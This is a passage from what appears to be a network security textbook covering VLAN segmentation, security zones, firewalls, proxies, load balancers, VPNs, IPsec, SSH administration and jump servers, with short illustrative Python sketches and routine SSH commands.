uses the Neighbor Discovery (ND) protocol for the same purpose.
Virtual LANs
Mapping the logical IP topology to physical hardware switches is not always
straightforward. This problem is addressed by the virtual LAN (VLAN) feature
supported by most switches. All switches connected together on the same on-
premises network can be configured with a consistent set of VLAN IDs. A VLAN ID
is a value from 2 to 4,094. Any given switch port can be assigned to a specific VLAN,
regardless of the physical location of the switch. Different ports on the same switch
can be assigned to different VLANs.
Each VLAN is a separate broadcast domain. Any traffic sent from one VLAN to
another must be routed. This means that the segmentation enforced by VLANs
at layer 2 can be mapped to logical divisions defined by IP subnets at layer 3.
Configuring VLANs allows segmentation of hosts attached to the same switch. Each VLAN has a
separate subnet. Traffic between hosts in different VLANs must go via the router or layer 3 switch.
In the diagram above, the access block for client devices uses two VLANs to
segment workstation computer hosts (VLAN32) from Voice over Internet Protocol
(VoIP) handsets (VLAN40). The VLANs map to two subnets: 10.1.32.0/24 and
10.1.40.0/24.
A VoIP handset with IP address 10.1.40.100 would need to use a router to contact a
computer host with IP 10.1.32.100. The two hosts might be connected to the same
switch, but the VLAN configuration prevents them from communicating with one
another directly. Additionally, an access control rule configured on the router could
prevent this type of communication if it were deemed a risk to security.
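The same-subnet test that determines whether traffic must be routed can be sketched with the two example subnets. The `needs_router` helper is an illustration of the logic, not how a switch actually implements it.

```python
import ipaddress

workstations = ipaddress.ip_network("10.1.32.0/24")  # VLAN32
voip = ipaddress.ip_network("10.1.40.0/24")          # VLAN40

def needs_router(src, dst):
    """Two hosts must communicate via a router unless they share a subnet."""
    src, dst = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    for net in (workstations, voip):
        if src in net and dst in net:
            return False
    return True

print(needs_router("10.1.40.100", "10.1.32.100"))  # True — routed between VLANs
print(needs_router("10.1.32.10", "10.1.32.100"))   # False — same VLAN32 subnet
```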
The VLAN topology can be extended across multiple switches. Consider the scenario
where the office expands to a second floor, which requires an additional switch
appliance to provision sufficient ports. The same VLAN IDs and subnets could be
configured for floor two, making devices on the two floors part of the same two
workstation and VoIP segments.
Security Zones
The network architecture features that create segments mapped to subnets allow
the creation of a zone-based security topology. On-premises networks have a clear
organizational boundary at the network perimeter. Hosts outside the perimeter are
in a public Internet zone and are untrusted. Hosts within the perimeter will have
different levels of trust and access control requirements.
To map out the internal security topology, analyze the systems and data assets that
support workflows and identify ones that have similar access control requirements:
• Database and file systems that host company data and personal data should
prioritize confidentiality and integrity. Data should not usually be held within a
single zone, however. Think about the impact when a zone is compromised.
If a single zone stores all types of data assets, the impact will be extremely high.
Separating different kinds of information into different zones will reduce the
breach’s impact.
• Client devices need to prioritize integrity and availability. These devices should
not store data and therefore have a lower confidentiality requirement.
• Public-facing application servers (web, email, remote access, and so on) should
also prioritize integrity and availability. They should not store sensitive data, such
as account credentials. Publicly accessible servers must not be considered fully
trusted.
This analysis will generate a list of the security zones needed. The network
architecture and security control infrastructure must ensure that these zones
are segregated from one another by physical and/or logical segmentation. Traffic
between zones should be strictly controlled using a security device, typically a
firewall. Traffic policies should apply the principle of least privilege.
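A least-privilege traffic policy can be sketched as a default-deny rule table: only explicitly allowed zone pairs pass. The zone names and allowed pairs below are illustrative assumptions, not a prescribed ruleset.

```python
# Default-deny zone policy sketch. Only the listed (source, destination)
# zone pairs are permitted; everything else is implicitly denied.
ALLOWED = {
    ("guest", "internet"),
    ("workstations", "internet"),
    ("workstations", "servers"),
    ("internet", "public_servers"),
}

def permit(src_zone, dst_zone):
    """Apply least privilege: deny unless the zone pair is explicitly allowed."""
    return (src_zone, dst_zone) in ALLOWED

print(permit("guest", "internet"))           # True
print(permit("guest", "workstations"))       # False — guests cannot reach the LAN
print(permit("public_servers", "internet"))  # False — no outbound initiation
```

Real firewalls evaluate ordered rules over addresses, ports, and protocols, but the principle is the same: anything not explicitly permitted is denied.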
Hosts are trusted in the sense that they are under administrative control and subject to
the security mechanisms (antivirus software, user rights, software updating, and so on)
that have been set up to defend the network.
A zone must have a known entry and exit point. For example, if the only authorized
access point for a zone is a router, placing a wireless access point within the zone would
be a security violation.
Network diagram showing security zone privilege levels and simplified access rules.
The diagram illustrates how traffic between hosts in zones with different privilege
sensitivities can be subject to access controls:
1. A low privilege zone containing hosts that are difficult to secure and patch,
such as printers, can accept connections but cannot initiate requests to any
other hosts.
3. Hosts in a guest zone can access the Internet, but are not allowed to access
the enterprise LAN.
4. Public-facing servers can accept requests from the Internet but cannot initiate
requests to the enterprise LAN or to the Internet.
5. Where hosts are separated by VLANs within the same zone, additional access
rules can be configured. For example, app servers should be able to make
requests to databases, but not vice versa.
Attack Surface
The network attack surface is all the points at which a threat actor could gain
access to hosts and services. It is helpful to use the layer model to analyze the
potential attack surface:
• Layer 1/2—allows unauthorized hosts to connect to wall ports or wireless
networks and communicate with hosts within the same broadcast domain.
Additionally, you should consider the external/public attack surface separately from
the internal/private attack surface.
Each layer requires its own type of security controls to prevent, detect, and correct
attacks. Provisioning multiple control categories and functions to enforce multiple
layers of protection is referred to as defense in depth. Security controls deployed
to the network perimeter are designed to prevent external hosts from launching
attacks at any network layer. The division of the private network into segregated
zones is designed to mitigate risks from internal hosts that have either been
compromised or that have been connected without authorization.
Weaknesses in the network architecture make it more susceptible to undetected
intrusions or to catastrophic service failures. Typical weaknesses include the
following:
• Single points of failure—a “pinch point” relying on a single hardware server or
appliance or network channel.
Port Security
Each wall port and switch port represents an opportunity for a threat actor to attach
a device to the network. A threat actor who can operate a host with physical access
to a network segment can launch a variety of attacks.
Access to the physical switch ports and switch hardware should be restricted
to authorized staff. To accomplish this, place the switch appliances in secure
server rooms and/or lockable hardware cabinets. To prevent the attachment of
unauthorized client devices at unsecured wall ports, the switch port that the wall
port cabling connects to can be administratively disabled, or the patch cable can be
physically removed from the switch port. Completely disabling ports in this way can
introduce a lot of administrative overhead and allow room for error. Also, it doesn’t
provide complete protection, as an attacker could unplug a device from an enabled
port and connect their own machine. Consequently, more sophisticated methods of
ensuring port security have been developed.
Configuring ARP inspection on a Cisco switch. (Courtesy of Cisco Systems, Inc. Unauthorized
use not permitted.)
When a host connects to an 802.1X-enabled switch port, the switch opens the
port for the EAP over LAN (EAPoL) protocol only. The switch port only allows full
data access when the host has been authenticated. The switch receives an EAP
packet with the supplicant’s credentials. These are encrypted and cannot be read
by the switch. The switch uses the RADIUS protocol to send the EAP packet to the
authentication server. The authentication server can access the directory of user
accounts and can validate the credential. If authentication is successful, it informs
the switch that full network access can be granted.
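The port behavior described above can be sketched as a simple predicate. This is a conceptual illustration of the 802.1X gating logic, not switch configuration or the actual state machine.

```python
# Simplified 802.1X port gating: a controlled port forwards only EAPoL
# traffic until the authentication server, reached via RADIUS, reports
# success. Traffic categories here are illustrative labels.
def port_allows(traffic, authenticated):
    if traffic == "eapol":
        return True       # always permitted, to carry the authentication itself
    return authenticated  # all other traffic gated on the RADIUS result

print(port_allows("eapol", authenticated=False))  # True
print(port_allows("data", authenticated=False))   # False
print(port_allows("data", authenticated=True))    # True
```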
IEEE 802.1X Port-based Network Access Control with RADIUS and EAP authentication.
(Images © 123RF.com.)
Physical Isolation
Some hosts are so security-critical that it is unsafe to connect them to any type of
network. One example is the root certification authority in PKI. Another example is
a host used to analyze malware execution. A host that is not physically connected to
any network is said to be air-gapped.
It is also possible to configure an air-gapped network. This means that hosts within
the air-gapped network can communicate, but there is no cabled or wireless
connection to any other network. Military bases, government sites, and industrial
facilities use air-gapped networks.
Physically isolating a host or group of hosts improves security but also incurs
significant management challenges. Device administration has to be performed at
a local terminal. Any updates or installs have to be performed using USB or optical
media. This media is a potential attack vector and must be scanned before allowing
its use on an air-gapped host.
Architecture Considerations
When evaluating the use of a particular architecture and selecting effective controls,
consider a number of factors:
• Costs—architecture changes and the acquisition and upgrade of appliances
and software require an up-front capital outlay, which can depreciate and lose
value. There are also ongoing maintenance and support liabilities. The value of
the investment in security architecture and controls can be calculated based on
how much they reduce losses from incidents.
• Resilience and ease of recovery—reduce the time to recover from a failure. For
example, a system that recovers from a failure without manual intervention is
more resilient than one that requires an administrator to restart it.
• Power—the facility must be able to meet the energy demands of its devices
and workloads. Higher compute resource usage increases power costs. Ensuring
that the building infrastructure minimizes power failures improves availability.
• Risk transference—contracting with a third party to manage the network
infrastructure. A service-level agreement (SLA) can be defined with penalties
if metrics for responsiveness, scalability, availability, and resilience are not
maintained.
On-premises networks tend to have high capital costs and low scalability. For
example, consider the difficulty of increasing bandwidth from 1 Gbps to 10 Gbps
operation across the entire site. This would likely require the installation of new
cable throughout the building. Recovery procedures can be complex if the site
premises is affected by a large-scale disaster. This means that availability and
resilience can be lower than alternative solutions such as cloud networking.
Review Activity:
Enterprise Network Architecture
Topic 5B
Network Security Appliances
Device Placement
The selection of effective controls for network infrastructure is the process of
choosing the type and placement of security appliances and software. The aim
is to enforce segmentation, apply access controls, and monitor traffic for policy
violations.
The selection of effective controls is governed by the principle of defense in depth.
Defense in depth means that security-critical zones are protected by diverse
preventive, detective, and corrective controls operating at each layer of the OSI
model. Defense in depth is ensured through careful selection of device placement
within the network topology. There are three options:
• Preventive controls—are often placed at the border of a network segment or
zone. Preventive controls such as firewalls enforce security policies on traffic
entering and exiting the segment, ensuring confidentiality and integrity. A load
balancer control ensures high availability for access to the zone.
As an illustration, the diagram shows how different control types can be positioned
within the network to ensure defense in depth:
1. At the network border, a preventive control such as a firewall enforces access
rules for ingress and egress traffic.
2. A sensor placed inline behind the border firewall relays traffic to an intrusion
detection system to implement detective control and identify malicious traffic
that has evaded the firewall.
3. Access control lists configured on internal routers enforce rules for traffic
being forwarded between internal zones and hosts.
4. Sensors attached to mirrored switch ports enable intrusion detection for the
most sensitive privilege level hosts or zones.
Device Attributes
Attributes determine the precise way in which a device can be placed within the
network topology.
• Test access point (TAP)—this is a box with ports for incoming and outgoing
network cabling and an inductor or optical splitter that physically copies the
signal from the cabling to a monitor port. There are types for copper and
fiber optic cabling. Unlike a SPAN, no logic decisions are made so the monitor
port receives every frame—corrupt or malformed or not—and the copying is
unaffected by load.
A TAP device is placed inline with the cable path, while a mirror port uses the switch to copy
frames to a detection system. The router/firewall is an active control as client devices must be
configured to use it for Internet access. The TAP and mirror ports are passive controls. They are
completely transparent to the server and client hosts.
• Fail-closed means that access is blocked or that the system enters the most
secure state available, given whatever failure occurred. This mode prioritizes
confidentiality and integrity over availability. The risk of a fail-closed control is
system downtime.
It may or may not be possible to configure the fail mode. For example, an inline
security appliance that suffers power failure will fail-closed unless there is an
alternative network path. Some devices designed to be installed inline have a
backup cable path that will allow a fail-open operation.
Firewalls
A firewall is a preventive control designed to enforce policies on traffic entering and
exiting a network zone.
Packet Filtering
A packet filtering firewall is configured by specifying a group of rules called an
access control list (ACL). Each rule defines a specific type of data packet and the
action to take when a packet matches the rule. A packet filtering firewall can inspect
the headers of IP packets. Rules are based on the information found in those
headers:
• IP filtering—accepts or denies traffic based on the source and/or destination IP
address. Most firewalls can also filter by MAC address.
If the action is configured to accept or permit, the firewall allows the packet to pass.
A drop or deny action silently discards the packet. A reject action blocks the packet
but responds to the sender with an ICMP message, such as “port unreachable”.
Separate ACLs filter inbound and outbound traffic. Controlling outbound traffic can
block applications not authorized to run on the network and defeat malware such
as backdoors.
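The first-match rule processing described above can be sketched as follows. This is a minimal illustration, not any vendor's ACL syntax; the rule fields and addresses are invented:

```python
import ipaddress

# Minimal first-match ACL evaluator. Each rule names a source network and
# destination port and an action: "accept" passes the packet, "drop"
# discards it silently, "reject" discards it and triggers an ICMP-style
# error back to the sender. A dport of None matches any port.

ACL = [
    {"src": "10.0.0.0/8", "dport": 22,   "action": "accept"},
    {"src": "0.0.0.0/0",  "dport": 22,   "action": "reject"},
    {"src": "0.0.0.0/0",  "dport": None, "action": "drop"},  # implicit deny
]

def evaluate(acl, src_ip, dport):
    for rule in acl:
        net = ipaddress.ip_network(rule["src"])
        if ipaddress.ip_address(src_ip) in net and rule["dport"] in (None, dport):
            return rule["action"]  # first matching rule wins
    return "drop"                  # default deny if nothing matches

assert evaluate(ACL, "10.1.2.3", 22) == "accept"
assert evaluate(ACL, "203.0.113.9", 22) == "reject"  # sender gets ICMP error
assert evaluate(ACL, "203.0.113.9", 80) == "drop"    # silently discarded
```

Note that rule order matters: moving the catch-all deny to the top would block everything, which is why ACLs are evaluated first match first.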
• Bridged (layer 2)—the firewall inspects traffic passing between two nodes,
such as a router and a switch. It bridges the Ethernet interfaces between the
two nodes, working like a switch. Despite performing forwarding at layer 2, the
firewall can still inspect and filter traffic on the basis of the full range of packet
headers. The firewall’s interfaces are configured with MAC addresses, but not IP
addresses.
• Inline (layer 1)—the firewall acts as a cable segment. The two interfaces don’t
have MAC or IP addresses. Traffic received on one interface is either blocked
or forwarded over the other interface. This is also referred to as virtual wire or
bump-in-the-wire.
Both bridged and inline firewall modes can be referred to as transparent modes.
The typical use case for a transparent mode is to deploy a firewall without having
to reconfigure subnets and reassign IP addresses on other devices. For example,
you could deploy a transparent firewall in front of a web server host without having
to change the host’s IP address. Alternatively, this type of firewall could be placed
between a router and a switch.
Status dashboard for the OPNsense open-source security platform. (Screenshot courtesy
of OPNsense.)
Layer 4 Firewall
Layer 4 is the OSI transport layer. A layer 4 firewall examines the TCP three-way
handshake to distinguish new from established connections. A legitimate TCP
connection should follow a SYN > SYN/ACK > ACK sequence to establish a session,
which is then tracked using sequence numbers. Deviations from this, such as SYN
without ACK or sequence number anomalies, can be dropped as malicious flooding
or session hijacking attempts. The firewall can be configured to respond to such
attacks by blocking source IP addresses and throttling sessions. It can also track
UDP traffic, though this is harder as UDP is a connectionless protocol. It is also
likely to be able to detect IP header and ICMP anomalies.
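A minimal sketch of this connection tracking, assuming a simplified state machine (a real layer 4 firewall also verifies sequence numbers and applies timeouts):

```python
# Track the TCP three-way handshake per connection. A SYN opens a pending
# entry; SYN/ACK and then ACK complete it. Segments that do not follow the
# expected sequence are dropped as possible flooding or hijacking attempts.
# Sequence-number checks and timeouts are omitted for brevity.

NEW, SYN_SEEN, SYNACK_SEEN, ESTABLISHED = "new", "syn", "synack", "established"

class ConnTracker:
    def __init__(self):
        self.table = {}  # (client, server) -> handshake state

    def observe(self, conn, flags):
        state = self.table.get(conn, NEW)
        if state == ESTABLISHED:
            return "allow"                 # established traffic passes
        expected = {NEW: "SYN", SYN_SEEN: "SYN/ACK", SYNACK_SEEN: "ACK"}
        if expected.get(state) == flags:
            advance = {NEW: SYN_SEEN, SYN_SEEN: SYNACK_SEEN,
                       SYNACK_SEEN: ESTABLISHED}
            self.table[conn] = advance[state]
            return "allow"
        return "drop"                      # deviation from the handshake

t = ConnTracker()
c = ("10.0.0.1:5000", "10.0.0.2:80")
assert [t.observe(c, f) for f in ("SYN", "SYN/ACK", "ACK")] == ["allow"] * 3
assert t.table[c] == ESTABLISHED
```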
Layer 7 Firewall
A layer 7 firewall can inspect the headers and payload of application-layer packets.
One key feature is to verify that the application protocol matches the port; for
instance, malware might try to send raw TCP data over port 80 simply because that
port is likely to be open. As another example, a web application firewall could analyze the HTTP
headers and the webpage formatting code present in HTTP packets to identify
strings that match a pattern in its threat database.
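As a toy illustration of this kind of payload inspection, the sketch below matches an HTTP payload against invented signature patterns; real WAF rulesets are far more extensive:

```python
import re

# Toy layer 7 inspection: match an HTTP payload against signature patterns
# standing in for a threat database. The patterns below are invented
# examples of common attack strings, not a real ruleset.

THREAT_PATTERNS = [
    re.compile(r"(?i)union\s+select"),  # SQL injection probe
    re.compile(r"(?i)<script\b"),       # reflected XSS attempt
    re.compile(r"\.\./\.\./"),          # directory traversal
]

def inspect_payload(payload):
    """Return the first matching signature, or None if the payload is clean."""
    for pattern in THREAT_PATTERNS:
        if pattern.search(payload):
            return pattern.pattern
    return None

assert inspect_payload("GET /?q=1 UNION SELECT passwd") is not None
assert inspect_payload("GET /index.html HTTP/1.1") is None
```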
Application-aware firewalls have many different names, including application layer
gateway, stateful multilayer inspection, and deep packet inspection. Application-
aware devices have to be configured with separate filters for each type of traffic
(HTTP and HTTPS, SMTP/POP/IMAP, FTP, and so on).
Proxy Servers
A firewall that performs application layer filtering is likely implemented as a proxy.
Where a network firewall only accepts or blocks traffic, a proxy server works on a
store-and-forward model. The proxy deconstructs each packet, performs analysis,
then rebuilds the packet and forwards it on, providing it conforms to the rules.
The amount of rebuilding depends on the proxy. Some proxies only manipulate the
IP and TCP headers. Application-aware proxies might add or remove HTTP headers.
A deep packet inspection proxy might be able to remove content from an HTTP
payload.
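The store-and-forward model can be sketched as follows. The specific header manipulations (stripping a hypothetical X-Internal-Token header, adding a Via header) are illustrative assumptions, not a description of any particular product:

```python
# Sketch of an application-aware proxy's store-and-forward model: the
# request is fully parsed, analyzed, rewritten, and only then forwarded.
# The header names manipulated here are invented for illustration.

def parse_request(raw):
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    headers = dict(line.split(": ", 1) for line in header_lines)
    return request_line, headers, body

def rebuild(request_line, headers, body):
    head = "\r\n".join([request_line] + [f"{k}: {v}" for k, v in headers.items()])
    return head + "\r\n\r\n" + body

def proxy(raw):
    request_line, headers, body = parse_request(raw)   # store
    headers.pop("X-Internal-Token", None)  # strip a sensitive header
    headers["Via"] = "1.1 example-proxy"   # mark the proxy hop
    return rebuild(request_line, headers, body)        # forward

out = proxy("GET / HTTP/1.1\r\nHost: example.com\r\n"
            "X-Internal-Token: abc\r\n\r\n")
assert "X-Internal-Token" not in out
assert "Via: 1.1 example-proxy" in out
```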
Configuring filter settings for the caching proxy server running on OPNsense. The filter can apply
ACLs to prohibit access to IP addresses and URLs. (Screenshot courtesy of OPNsense.)
Configuring transparent proxy settings for the proxy server running on OPNsense. The proxy
uses its own certificate to intercept secure connections and inspect the URL.
(Screenshot courtesy of OPNsense.)
Sensors
A network intrusion system captures traffic via a packet sniffer, referred to as a
sensor. The sensor could use a SPAN/mirror port or an inline TAP. Typically, the
packet capture sensor is placed behind a firewall or close to a server of particular
importance. The idea is usually to identify malicious traffic that has managed to get
past the firewall. A single sensor can record a large amount of traffic data, so you
cannot put sensors everywhere in the network without provisioning the
resources to manage them properly. Depending on network size and resources,
one or a few sensors are deployed to monitor key assets or network paths.
Viewing an intrusion detection alert generated by Snort in the Kibana app on Security Onion.
(Screenshot courtesy of Security Onion https://securityonionsolutions.com.)
To some extent, NGFW and UTM are just marketing terms. UTM is commonly deployed
in small and medium-sized businesses that require a comprehensive security solution
but have limited resources and IT expertise. A UTM is seen as a turnkey "do everything"
solution, while a NGFW is an enterprise product with fewer features but better
performance.
Load Balancers
A load balancer distributes client requests across available server nodes in a
farm or pool. This is used to provision services that can scale from light to heavy
loads and to provide mitigation against denial of service attacks. A load balancer
also provides fault tolerance. If there are multiple servers available in a farm all
addressed by a single name/IP address via a load balancer, then if a single server
fails, client requests can be forwarded to another server in the farm.
A load balancer can be deployed in any situation where there are multiple
servers providing the same function. Examples include web servers, front-end
email servers, web conferencing, video conferencing, and streaming media
servers.
Scheduling
The scheduling algorithm is the code and metrics that determine which node is
selected for processing each incoming request. The simplest type of scheduling
is called round robin; this means picking the next node. Other methods include
picking the node with the fewest connections or the best response time. Each
method can be weighted using administrator-set preferences or dynamic load
information, or both.
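These scheduling methods can be sketched as follows (a simplified model; real load balancers combine weighting with live health and load metrics):

```python
import itertools

# Sketches of two scheduling algorithms. Round robin simply cycles through
# the pool in turn; least-connections picks the node currently handling
# the fewest active sessions. Weighting and health checks are omitted.

class RoundRobin:
    def __init__(self, nodes):
        self._cycle = itertools.cycle(nodes)

    def pick(self):
        return next(self._cycle)  # next node in rotation

def least_connections(active):
    """active maps node name -> current connection count."""
    return min(active, key=active.get)

rr = RoundRobin(["web1", "web2", "web3"])
assert [rr.pick() for _ in range(4)] == ["web1", "web2", "web3", "web1"]
assert least_connections({"web1": 12, "web2": 3, "web3": 7}) == "web2"
```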
The load balancer must also use some type of heartbeat or health check probe to
verify whether each node is available and under load or not. Layer 4 load balancers
can only make basic connectivity tests while layer 7 appliances can test the
application’s state and verify host availability.
With the ModSecurity WAF installed to this IIS server, a scanning attempt has been detected
and logged as an Application event. As you can see, the default ruleset generates a lot of events.
(Screenshot used with permission from Microsoft.)
A WAF may be deployed as an appliance protecting the zone that the web server is
placed in or as plug-in software for a web server platform.
Review Activity:
Network Security Appliances
1. True or False? As they protect data at the highest layer of the protocol
stack, application-based firewalls have no basic packet filtering
functionality.
4. What IPS mechanism can be used to block traffic that violates policy
without also blocking the traffic source?
Topic 5C
Secure Communications
A VPN can also be deployed in a site-to-site model to connect two or more private
networks. Whereas remote access VPN connections are typically initiated by the
client, a site-to-site VPN is configured to operate automatically. The gateways
exchange security information using whichever protocol the VPN is based on.
This establishes a trust relationship between the gateways and sets up a secure
connection through which to tunnel data. Hosts at each site do not need to be
configured with any information about the VPN. The routing infrastructure at each
site determines whether to deliver traffic locally or send it over the VPN tunnel.
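The per-site routing decision can be sketched with Python's ipaddress module; the prefixes here are invented for illustration:

```python
import ipaddress

# Sketch of the routing decision at one site of a site-to-site VPN:
# traffic for the local prefix is delivered directly, traffic for the
# remote site's prefix goes into the VPN tunnel, and everything else
# follows the default route. The prefixes are invented examples.

LOCAL_PREFIX = ipaddress.ip_network("10.1.0.0/16")   # this site
REMOTE_PREFIX = ipaddress.ip_network("10.2.0.0/16")  # site behind the tunnel

def next_hop(dst):
    addr = ipaddress.ip_address(dst)
    if addr in LOCAL_PREFIX:
        return "local"        # deliver on the local network
    if addr in REMOTE_PREFIX:
        return "vpn-tunnel"   # encrypt and tunnel to the peer gateway
    return "default-route"    # ordinary Internet-bound traffic

assert next_hop("10.1.5.9") == "local"
assert next_hop("10.2.8.1") == "vpn-tunnel"
assert next_hop("8.8.8.8") == "default-route"
```

Because the decision is made by the routing infrastructure, hosts at each site need no VPN configuration of their own, matching the behavior described above.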
Several VPN protocols have been used over the years. Legacy protocols such as the
Point-to-Point Tunneling Protocol (PPTP) have been deprecated because they do
not offer adequate security. Transport Layer Security (TLS) and Internet Protocol
Security (IPsec) are now the preferred options for configuring VPN access.
Configuring an OpenVPN server in the OPNsense security appliance. This configuration creates
a remote access VPN. Users are authenticated via a RADIUS server on the local network.
(Screenshot courtesy of OPNsense.)
A TLS VPN can use either TCP or UDP. UDP might be chosen for marginally superior
performance, especially when tunneling latency-sensitive traffic such as voice or video.
TCP might be easier to use with a default firewall policy. TLS over UDP is also referred to
as Datagram TLS (DTLS).
It is important to use a secure version of TLS. The latest version at the time of writing is
TLS 1.3. TLS 1.2 is also still supported. Versions earlier than this are deprecated.
• Encapsulating Security Payload (ESP) can be used to encrypt the packet rather
than simply calculating an ICV. ESP attaches three fields to the packet: a header,
a trailer (providing padding for the cryptographic function), and an Integrity
Check Value. Unlike AH, ESP excludes the IP header when calculating the ICV.
Configuring a site-to-site VPN using IPsec tunneling with ESP encryption in the OPNsense
security appliance. (Screenshot courtesy of OPNsense.)
2. Phase II uses the secure channel created in Phase I to establish which ciphers
and key sizes will be used with AH and/or ESP in the IPsec session.
There are two versions of IKE. Version 1 was designed for site-to-site and host-to-
host topologies and requires a supporting protocol to implement remote access
VPNs. IKEv2 has some additional features that have made the protocol popular for
use as a stand-alone remote access client-to-site VPN solution. The main changes
are the following:
• Supports EAP authentication methods, allowing, for example, user
authentication against a RADIUS server.
Remote Desktop
A remote access VPN joins the user’s PC or smartphone to a remote private network
via a secure tunnel over a public network. Remote access can also be a means
of connecting to a specific computer over a network. This type of remote access
involves connecting to a terminal server on a host using software that transfers
shell data only. The connection could be a client and terminal server on the same
local network or across remote networks.
A graphical remote access tool sends screen and audio data from the remote host
to the client and transfers mouse and keyboard input from the client to the remote
host. Microsoft’s Remote Desktop Protocol (RDP) can be used to access a physical
machine on a one-to-one basis.
Alternatively, a site can operate a remote desktop gateway that facilitates access
to virtual desktops or individual apps running on the network servers. RDP
connections are encrypted by default. There are several popular alternatives to
Remote Desktop. Most support remote access to platforms other than Windows
(macOS and iOS, Linux, Chrome OS, and Android, for instance). Examples include
TeamViewer (teamviewer.com/en) and Virtual Network Computing (VNC), which
is implemented by several different providers (notably realvnc.com/en).
In the past, these remote desktop products required a dedicated client app.
Remote desktop access can now just use a web browser client. The canvas element
introduced in HTML5 allows a browser to draw and update a desktop with relatively
little lag. It can also handle audio. This is referred to as an HTML5 VPN or as a
clientless remote desktop gateway (guacamole.apache.org). This solution uses a
protocol called WebSocket, which enables bidirectional messages to be sent between
the server and client without requiring the overhead of separate HTTP requests.
Secure Shell
Secure Shell (SSH) is the principal means of obtaining secure remote access to a
command line terminal. The main uses of SSH are for remote administration and
secure file transfer (SFTP). Numerous commercial and open-source SSH products
are available for all the major NOS platforms. The most widely used is OpenSSH
(openssh.com).
SSH servers are identified by a public/private key pair that is referred to as the
host key. Host names can be mapped to host keys manually by each SSH client,
or through various enterprise software products designed for SSH host key
management.
Confirming the SSH server’s host key using the PuTTY SSH client. (Screenshot used
with permission from PuTTY.)
The host key must be changed if any compromise of the host is suspected. If an attacker
has obtained the private key of a server or appliance, they can masquerade as that
server or appliance and perform a spoofing attack, usually with a view to obtaining
other network credentials.
The server’s host key is used to set up a secure channel to use for the client to
submit authentication credentials.
• Public key authentication—is when each remote user’s public key is added to a
list of keys authorized for each local account on the SSH server.
• Kerberos—is when the client submits the Kerberos credentials (a Ticket Granting
Ticket) obtained when the user logs onto the workstation to the server using the
Generic Security Services Application Program Interface (GSSAPI). The SSH server
contacts the Ticket Granting Service (in a Windows environment, this will be a
domain controller) to validate the credentials.
Managing valid client public keys is a critical security task. Many recent attacks on web
servers have exploited poor key management. If a user's private key is compromised,
delete the public key from the appliance and then regenerate the key pair on the user's
(remediated) client device and copy the public key to the SSH server. Always delete
public keys when the user's access permissions have been revoked.
SSH Commands
SSH commands are used to connect to hosts and set up authentication methods.
To connect to an SSH server at 10.1.0.10 using an account named “bobby” and
password authentication, run:
ssh bobby@10.1.0.10
The following commands create a new key pair and copy it to an account on the
remote server:
ssh-keygen -t rsa
ssh-copy-id bobby@10.1.0.10
At an SSH prompt, you can now use the standard Linux shell commands. Use exit
to close the connection.
You can use the scp command to copy a file from the remote server to the local
host:
scp bobby@10.1.0.10:/logs/audit.log audit.log
Reverse the arguments to copy a file from the local host to the remote server. To copy
the contents of a directory and any subdirectories (recursively), use the -r option.
Out-of-Band Management
Remote management methods are either in-band or out-of-band (OOB). An
in-band management link shares traffic with other communications on the
production network. The connection method must use TLS, IPsec, RDP, or
SSH encrypted sessions to ensure confidentiality and integrity.
Jump Servers
One of the challenges of managing hosts exposed to the Internet, such as in a
screened subnet or cloud network, is providing administrative access to the servers
and appliances located within it. On the one hand, a link is necessary; on the
other, the administrative interface could be compromised and exploited as a pivot
point into the rest of the network. Consequently, management of hosts permitted
to access administrative interfaces on hosts in the secure zone must be tightly
controlled. Configuring and auditing this type of control when there are many
different servers operating in the zone is complex.
One solution to this complexity is to add a single administration server, or jump
server, to the secure zone. The jump server only runs the necessary administrative
port and protocol, such as SSH or RDP. Administrators connect to the jump server
and then use the jump server to connect to the admin interface on the application
server. The application server’s admin interface has a single entry in its ACL (the
jump server) and denies connection attempts from any other hosts.
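The single-entry ACL can be sketched as follows (the jump server address and management port are invented for illustration):

```python
# Sketch of the admin-interface ACL described above: only the jump
# server's address may connect to the management port; all other sources
# are denied, while ordinary service traffic is unaffected. The address
# and port values are invented for illustration.

JUMP_SERVER = "10.0.99.5"
ADMIN_PORT = 22

def admin_acl(src_ip, dport):
    if dport == ADMIN_PORT and src_ip == JUMP_SERVER:
        return "accept"   # the single permitted management source
    if dport == ADMIN_PORT:
        return "deny"     # admin port reachable only via the jump server
    return "accept"       # other service traffic passes as normal

assert admin_acl("10.0.99.5", 22) == "accept"
assert admin_acl("10.0.50.7", 22) == "deny"
assert admin_acl("10.0.50.7", 443) == "accept"
```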
Review Activity:
Secure Communications
1. True or false? A TLS VPN can only provide access to web-based network
resources.
2. What IPsec mode would you use for data confidentiality on a private
network?
Lesson 5
Summary
• Deploy switching and routing appliances and protocols to support each block,
accounting for port security or 802.1X network access control (NAC).
• Analyze the attack surface and select effective controls deployed to appropriate
network locations:
• Deploy port security or 802.1X NAC to mitigate risks from rogue devices
attached to physical network ports.
• Consider the use of proxy servers, NGFW, and WAF for advanced application
and user-aware filtering.
LESSON INTRODUCTION
Cloud network architecture encompasses a range of concepts and technologies
designed to ensure the confidentiality, integrity, and availability of data and
applications within cloud-based environments. Cloud architecture and modern
software deployment practices enable seamless integration, management, and
optimization of resources within cloud-based environments. Key features include
on-demand provisioning, elasticity, and scalability, which allow rapid deployment
and dynamic adjustments to computing, storage, and network resources as
required.
Additionally, multi-tenancy and virtualization technologies enable efficient resource
sharing and isolation among diverse users and workloads. Cloud architecture
also employs load balancing and auto-scaling to distribute workloads evenly and
maintain high availability and performance. Furthermore, hybrid and multi-cloud
strategies allow organizations to leverage various cloud service providers, reducing
vendor lock-in and promoting a more resilient and cost-effective infrastructure.
Lesson Objectives
In this lesson, you will do the following:
• Summarize secure cloud and virtualization services.
Topic 6A
Cloud Infrastructure
• Hosted Private—is hosted by a third party for the exclusive use of the
organization. This is more secure and can guarantee better performance but is
correspondingly more expensive.
There will also be cloud computing solutions that implement a hybrid public/
private/community/hosted/on-site/off-site solution. For example, a travel
organization may run a sales website for most of the year using a private cloud but
break out the website to a public cloud when much higher utilization is forecast.
Flexibility is a key advantage of cloud computing, but the implications for data risk
must be well understood when moving data between private and public storage
environments.
Security Considerations
Different cloud architecture models have varying security implications to consider
when deciding which one to use.
• Single-tenant architecture—provides dedicated infrastructure to a single
customer, ensuring that only that customer can access the infrastructure. This
model offers the highest level of security as the customer has complete control
over the infrastructure. However, it can be more expensive than multi-tenant
architecture, and the customer is responsible for managing and securing the
infrastructure.
Hybrid Cloud
A hybrid cloud most commonly describes a computing environment combining
public and private cloud infrastructures, although any combination of cloud
